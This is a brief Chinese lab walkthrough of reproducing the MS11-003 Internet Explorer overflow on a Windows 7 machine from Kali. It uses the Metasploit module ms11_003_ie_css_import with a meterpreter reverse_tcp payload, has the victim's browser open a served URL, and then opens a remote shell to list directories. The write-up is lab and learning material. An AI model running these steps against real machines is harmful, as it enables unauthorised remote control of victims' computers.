MS11_003漏洞复现
MS11_003(windows7IE溢出攻击)
先配置环境
kali(攻击者);
windows7
标题在Windows7查看IP地址
命令:ipconfig
Windows7 IP地址:192.168.164.155
在kali中使用ping命令查看是否与主机相通
打开msfconsole模块
寻找 ms11_003漏洞并使用
search ms11_003
use exploit/windows/browser/ms11_003_ie_css_import
查看payload
show payloads
选择其中的
set payloads windows/meterpreter/reverse_tcp
查看kali得ip
设置参数(后面跟的IP地址为kali IP)
uripath后面得参数随意写即可
运行 run
复制结果中的 http://192.168.164.128:8080/00,到Windows7的ie浏览器中进行粘贴
出现相同情况则为成功连接会话
输入sessions 查看会话id
随便选取一个ID(若选取的不行,换下一个即可)
然后输入shell即可获得Windows7shell
输入dir即可遍历目录
到这里复现完成。。。。